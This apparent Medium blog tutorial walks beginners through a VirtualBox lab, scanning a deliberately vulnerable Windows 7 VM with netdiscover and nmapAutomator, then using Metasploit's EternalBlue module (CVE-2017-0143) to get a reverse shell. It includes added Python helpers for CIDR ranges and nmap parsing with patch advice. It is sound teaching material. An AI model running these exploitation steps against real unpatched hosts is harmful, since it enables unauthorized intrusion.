
Easy Mode: Hacking Your First Windows Box (Lab)

Tj Houston, MBA · 5 min read · Nov 5, 2022


I downloaded Kali Linux, now what? That’s what a lot of aspiring cybersecurity students think. If you browse through the menus, you may be overwhelmed by what you see. Rest assured, before you know it you will wrangle the dragon and start your ethical hacking journey! Today we are going to do an easy lab in which we use one of the most well-known exploits (Eternal Blue) to get access to a vulnerable box. This lab is meant to get you acclimated to a few of the tools within Kali in a safe environment.

Note: This tutorial is for educational purposes only and you should only utilize these tools on devices that you have express permission to access.

For this lab we are using VirtualBox. Before getting started you should have VirtualBox downloaded and have a Kali machine installed as your attacking machine.

To get started, download the vulnerable machine for this lab:

https://drive.google.com/file/d/1vMszZFJpmULp_l60NU7WaUla0JIw7qi9/view?usp=sharing

History of Eternal Blue — https://en.wikipedia.org/wiki/EternalBlue

Workspace Setup:
First things first, let’s make sure Kali is up to date.

sudo apt update && sudo apt upgrade -y && sudo apt dist-upgrade -y && sudo apt autoremove

I like to create tabs in the terminal for whatever tool I am using. This helps me keep organized while I am working on a machine. You can do this in Kali by right-clicking on the tab and giving it a name and changing the color.

Let’s just do a quick check to see what our IP address is by running:

ifconfig

We can see that the IP address of our ethernet interface is 192.168.2.7.


In most cases, especially with CTF machines, you will not know the IP address of the machine you are targeting, so you will need a way to find out. For this, there is a small but useful program called netdiscover. Netdiscover sends ARP requests to the desired range and reports which machines reply. To run netdiscover, type the following. Note that the “/” notation represents the subnet mask: /24 means the first 24 bits (the first three octets) are fixed, so we are only checking the devices in the last octet.

sudo netdiscover -r 192.168.2.0/24

It looks like our target machine is 192.168.2.8 (I had some issues so this changes to .10 when
we dive into Metasploit)
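What the /24 actually covers, as an added example that is not part of the original post: a short Python helper built on the standard-library ipaddress module that shows which addresses a prefix such as 192.168.2.0/24 includes, how many hosts a sweep of that range has to probe, and whether a given host falls inside it. The addresses are the ones from this lab; the function names are mine.

```python
import ipaddress


def describe_cidr(cidr: str) -> dict:
    """Summarise what a CIDR prefix such as 192.168.2.0/24 covers.

    strict=False also accepts a host address like 192.168.2.7/24; the host
    bits are masked off to find the network it belongs to.
    """
    net = ipaddress.ip_network(cidr, strict=False)
    # hosts() leaves out the network and broadcast addresses for /30 and
    # larger; for /31 and /32 it returns the addresses themselves.
    hosts = list(net.hosts()) or [net.network_address]
    return {
        "network": str(net.network_address),
        "netmask": str(net.netmask),
        "broadcast": str(net.broadcast_address),
        "first_host": str(hosts[0]),
        "last_host": str(hosts[-1]),
        # Number of addresses an ARP sweep of this range has to probe.
        "usable_hosts": len(hosts),
        # Fixed (network) bits vs. the bits that vary across the range.
        "fixed_bits": net.prefixlen,
        "variable_bits": net.max_prefixlen - net.prefixlen,
    }


def in_same_network(ip: str, cidr: str) -> bool:
    """True if ip lies inside the network described by cidr."""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(cidr, strict=False)


if __name__ == "__main__":
    # /24 fixes the first three octets, so only the last octet varies.
    for prefix in ("192.168.2.0/24", "192.168.2.7/24", "192.168.0.0/16"):
        print(prefix, describe_cidr(prefix))
    # Our Kali box and the lab target are on the same /24.
    print(in_same_network("192.168.2.8", "192.168.2.7/24"))
```

Passing the attacking machine's own address with the prefix (192.168.2.7/24) is a quick way to get the range to hand to netdiscover without working out the network address by hand.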

Enumeration:
Now that we have our target IP address we can start our enumeration. At this point, you can
use your scanner of choice. I prefer to use nMapAutomator because you constantly get
information as the scans are happening and you can be more efficient. You can find more
information about nMapAutomator here: https://github.com/21y4d/nmapAutomator

Once you have nMapAutomator downloaded you can use it to scan your host:

sudo ./nmapAutomator.sh --host 192.168.2.8 --type All

Within a few seconds we can already start to get information about the host:

As the tool runs in the background, let’s take a look at what is open on this machine. This is our attack surface: the open ports are the services we can try to use to make our way in. When I see a scan like this I get excited, because 139 and 445 being open tells us that this machine is most likely running SMB, so we can get more information about the domain, or it may be susceptible to Eternal Blue.
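Reading the open ports as attack surface, as an added example that is not from the original post: a Python parser for nmap's normal output that keeps only ports in the open state (filtered and closed ports are not exposure) and flags a host answering on 139 or 445 as having SMB reachable, together with the defender's follow-up for such a host: confirm SMBv1 is disabled and the MS17-010 patch for this vulnerability is installed, and keep 139/445 off untrusted networks. The scan text embedded in the block is constructed for illustration, not the lab's actual output; function names are mine.

```python
from __future__ import annotations

import re
from typing import NamedTuple

# Constructed sample of nmap "normal" output for a host exposing SMB. This is
# not the scan from the post; the service strings are typical of an unpatched
# Windows 7 lab box.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.2.8
Host is up (0.00042s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp  filtered ms-wbt-server
49152/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: WIN7-LAB; OS: Windows; CPE: cpe:/o:microsoft:windows
"""


class OpenPort(NamedTuple):
    port: int
    proto: str
    service: str
    version: str


# port/proto, state, service, optional version text.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# 139 is the NetBIOS session service (SMB over NetBIOS); 445 is SMB over TCP.
SMB_PORTS = {139, 445}


def parse_open_ports(report: str) -> list[OpenPort]:
    """Return the ports nmap marks 'open'; filtered/closed ports are skipped."""
    found: list[OpenPort] = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, host lines, Service Info, etc.
        port, proto, state, service, version = m.groups()
        if state == "open":
            found.append(OpenPort(int(port), proto, service, (version or "").strip()))
    return found


def smb_exposed(ports: list[OpenPort]) -> bool:
    """True if SMB is reachable on this host over TCP."""
    return any(p.port in SMB_PORTS and p.proto == "tcp" for p in ports)


def exposure_summary(report: str) -> dict:
    """Open ports plus the remediation check a defender would schedule."""
    ports = parse_open_ports(report)
    exposed = smb_exposed(ports)
    return {
        "open_ports": [p.port for p in ports],
        "smb_exposed": exposed,
        "follow_up": (
            "verify SMBv1 is disabled and MS17-010 is installed; restrict 139/445"
            if exposed
            else "no SMB exposure on this host"
        ),
    }


if __name__ == "__main__":
    for p in parse_open_ports(SAMPLE_SCAN):
        print(f"{p.port}/{p.proto:<3} {p.service:<14} {p.version}")
    print(exposure_summary(SAMPLE_SCAN))
```

Run it against a real report by replacing SAMPLE_SCAN with the contents of nmap's `-oN` file; the same parser works for the per-port lines nmapAutomator writes out.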

Scan Results:
After a few minutes, the scan finishes and we can see the results of the vulnerability scan:

Exploitation
For exploitation there is a great tool called Metasploit. Metasploit is a framework that brings
together a ton of different exploits and makes exploitation super easy. For more information
about the Metasploit project check out the Metasploit website https://www.metasploit.com/

Let’s see if we can utilize the information we gained during our enumeration in Metasploit and make our way into the system.

Create a new tab and start msfconsole:

msfconsole

Once Metasploit has started, let’s do a quick search to see if there is an exploit that we can use that takes advantage of CVE-2017-0143.

To do this type:

search 2017-0143

This will tell us what exploits are available and also which ones should have the most success.

Note: When you are looking at the different exploit options there are a few things to look out for. First, it is important to find an exploit that does what you want it to do. In our case, we want to get root access and we don’t have a foothold on the system, so we want an RCE (Remote Code Execution) exploit. Also, take note of the rank of each exploit: in our case we have a few ranked normal, one ranked average, and one ranked great.

Use the first exploit by typing:

use 0

Once the exploit is loaded, let’s see what options are available by typing:

show options

So for this exploit, we need to set our RHOST (remote host) as well as our LHOST (local host). We do this by typing:

set rhost 192.168.2.10

set lhost 192.168.2.7

When we type run, we can see the exploit kick off and we get a remote shell into the Windows 7 machine:

You have now attacked your first machine and successfully gained access to a remote Windows machine from Kali Linux!

Bonus Challenge
For this machine we used the reverse shell, and we got access to a standard command prompt. There is a cool tool built into Metasploit called meterpreter (https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/). How could you get access to this machine but with the meterpreter shell instead of the standard Windows shell?

https://medium.tjhouston.com/easy-mode-hacking-your-first-windows-box-lab-d0adace066e5
